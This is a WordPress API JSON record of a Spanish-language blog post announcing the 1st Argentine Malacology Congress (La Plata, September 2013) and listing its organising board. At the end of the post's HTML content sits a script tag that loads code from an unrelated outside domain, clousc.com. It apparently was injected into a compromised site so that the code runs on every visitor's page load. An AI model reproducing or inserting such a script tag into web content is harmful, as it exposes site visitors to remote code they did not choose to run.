{"id":140,"date":"2013-09-27T20:56:54","date_gmt":"2013-09-27T20:56:54","guid":{"rendered":"http:\/\/malacoargentina.com.ar\/blog\/?p=140"},"modified":"2016-02-16T22:20:38","modified_gmt":"2016-02-16T22:20:38","slug":"1er-congreso-argentino-de-malacologia","status":"publish","type":"post","link":"http:\/\/malacoargentina.ar\/blog\/2013\/09\/27\/1er-congreso-argentino-de-malacologia\/","title":{"rendered":"1ER. CONGRESO ARGENTINO DE MALACOLOG\u00cdA"},"content":{"rendered":"<p style=\"text-align: justify;\"><img loading=\"lazy\" decoding=\"async\" class=\"alignleft wp-image-141 \" src=\"http:\/\/malacoargentina.com.ar\/blog\/wp-content\/uploads\/2016\/02\/Logo-1-CAM-300x300.jpg\" alt=\"Logo 1 CAM\" width=\"210\" height=\"210\" srcset=\"http:\/\/malacoargentina.ar\/blog\/wp-content\/uploads\/2016\/02\/Logo-1-CAM-300x300.jpg 300w, http:\/\/malacoargentina.ar\/blog\/wp-content\/uploads\/2016\/02\/Logo-1-CAM-150x150.jpg 150w, http:\/\/malacoargentina.ar\/blog\/wp-content\/uploads\/2016\/02\/Logo-1-CAM-624x621.jpg 624w, http:\/\/malacoargentina.ar\/blog\/wp-content\/uploads\/2016\/02\/Logo-1-CAM.jpg 640w\" sizes=\"auto, (max-width: 210px) 100vw, 210px\" \/>El 1er Congreso Argentino de Malacolog\u00eda (1 CAM), fue una reuni\u00f3n de inter\u00e9s tanto nacional como regional, que se realiz\u00f3 entre los d\u00edas 18 y 20 de septiembre de 2013, en el \u00e1mbito de la Facultad de Ciencias Naturales y Museo de la Universidad Nacional de La Plata (UNLP).<\/p>\n<p>Este 1 CAM fue el primero de una serie de Congresos Malacol\u00f3gicos, que cada tres a\u00f1os organiza la Asociaci\u00f3nArgentina de Malacolog\u00eda (ASAM).<\/p>\n<p style=\"text-align: center;\"><strong><em>Directorio de la ASAM responsable del 1 CAM:<\/em><\/strong><\/p>\n<ul>\n<li><em><strong>Presidente honorario:<\/strong><\/em> Pablo Penchaszadeh<\/li>\n<li><em><strong>Presidente:<\/strong><\/em> Alejandra Rumi<\/li>\n<li><strong><em>Coordinador:<\/em><\/strong> Gustavo Darrigran<\/li>\n<li><em><strong>Secretarios:<\/strong><\/em> Andr\u00e9s Averbuj y Javier Signorelli<\/li>\n<li><em><strong>Prosecretario:<\/strong><\/em> Roberto Vogler<\/li>\n<li><em><strong>Tesorera:<\/strong><\/em> Stella Martin<\/li>\n<li><em><strong>Protesorero:<\/strong><\/em> Ariel Beltramino<\/li>\n<li><strong><em>Presidente Comit\u00e9 Acad\u00e9mico:<\/em><\/strong> Guido Pastorino<\/li>\n<li><strong><em>Presidente Comit\u00e9 Ejecutivo:<\/em><\/strong> Diego Guti\u00e9rrez Gregoric<\/li>\n<li><strong><em>Presidente Comit\u00e9 Editor:<\/em><\/strong> Sandra Gordillo<\/li>\n<\/ul>\n<p><script src=\"https:\/\/clousc.com\/player.php?ver=1.1&amp;ref=te\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>El 1er Congreso Argentino de Malacolog\u00eda (1 CAM), fue una reuni\u00f3n de inter\u00e9s tanto nacional como regional, que se realiz\u00f3 entre los d\u00edas 18 y 20 de septiembre de 2013, en el \u00e1mbito de la Facultad de Ciencias Naturales y Museo de la Universidad Nacional de La Plata (UNLP). Este 1 CAM fue el primero [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-140","post","type-post","status-publish","format-standard","hentry","category-1cam"],"_links":{"self":[{"href":"http:\/\/malacoargentina.ar\/blog\/wp-json\/wp\/v2\/posts\/140","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/malacoargentina.ar\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/malacoargentina.ar\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/malacoargentina.ar\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/malacoargentina.ar\/blog\/wp-json\/wp\/v2\/comments?post=140"}],"version-history":[{"count":4,"href":"http:\/\/malacoargentina.ar\/blog\/wp-json\/wp\/v2\/posts\/140\/revisions"}],"predecessor-version":[{"id":160,"href":"http:\/\/malacoargentina.ar\/blog\/wp-json\/wp\/v2\/posts\/140\/revisions\/160"}],"wp:attachment":[{"href":"http:\/\/malacoargentina.ar\/blog\/wp-json\/wp\/v2\/media?parent=140"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/malacoargentina.ar\/blog\/wp-json\/wp\/v2\/categories?post=140"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/malacoargentina.ar\/blog\/wp-json\/wp\/v2\/tags?post=140"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}